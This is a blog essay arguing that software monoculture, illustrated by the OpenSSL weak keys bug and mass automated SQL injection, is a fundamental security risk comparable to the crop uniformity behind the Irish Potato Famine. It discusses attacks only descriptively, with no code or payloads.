I discussed the OpenSSL bug in an earlier post. There I argued that complexity in software is a fundamental problem and we can't address it simply by continuing to do what we now do but do it better - that helps but it doesn't solve the underlying problem. I think the underlying problem is unsolvable and we need more emphasis on recoverability. Now I want to argue that lack of diversity in software is another fundamental problem that isn't addressed by our usual practices, like code reviews and vulnerability scans.

The OpenSSL weak keys bug is a big deal because the code is so widely used. Vulnerable database applications are used in so many Web sites that attackers are now automating SQL injection attacks by using Google to find their prey. From SearchSecurity:

SQL injection has come back into vogue with attackers for a number of reason, particularly the ease with which it can be automated. But it's also a maddeningly simple attack to execute, with a broad range of potential targets, making it appealing to both the low-level script kiddy as well as the pro who is looking for a big score.

"There's no commonality among these sites. They're just sites that have a programming mistake on them and these guys have picked the broadest attack surface possible, and that's where the SQL injection comes in," [Joe] Stewart [senior security researcher with SecureWorks] said.

Lack of diversity has wrecked havoc in biology as well. Take the Irish Potato Famine which has a number of parallels to how we develop and use software.

First, there is little variation. For software, we just copy source code and recompile or just copy binaries. Something analogous is at work with potatoes, from About Biodiversity:

Potatoes do not easily grow from seed, as do many other foods. They reproduce from enlarged underground root parts called tubers that are growing on existing plants. Potatoes are, in other words, clones of their mother plants.

And while in practice, there could be a lot of diversity in code, the economics of software development drives code reuse. The same problem emerged in Ireland in the 19th century:

But the potatoes that were growing in Ireland and Europe in the mid-1840s represented a very limited number of varieties. They lacked resistance to a fungus named Phytophthora infestans. The result was a terrible famine in Ireland, where so much agriculture depended on a single crop.

And finally, there are derived consequences:

The starving farm families were also forced to eat the rotten produce, which sickened them. Cholera and typhus, both deadly diseases, joined with starvation to kill an estimated 1 million people.

Now we have weak encryption keys in wide use and vulnerable database applications that leave us vulnerable to other kinds of attack. Again from SearchSecurity:

The result is that visitors to the site will then be forced to download a piece of malicious JavaScript code from another site. That code directs the user to a third site, where more malware is hosted, likely copies of Asprox or Danmec, Stewart says.

Lack of diversity is like complexity, we can't get rid of it with our usual set of tools. It's a product of how we use the software we build. We can't get rid of it so we need to figure out better ways to live with it. Ireland recovered and is doing well in spite of emerging economic challenges so we have historical precedent for some optimism.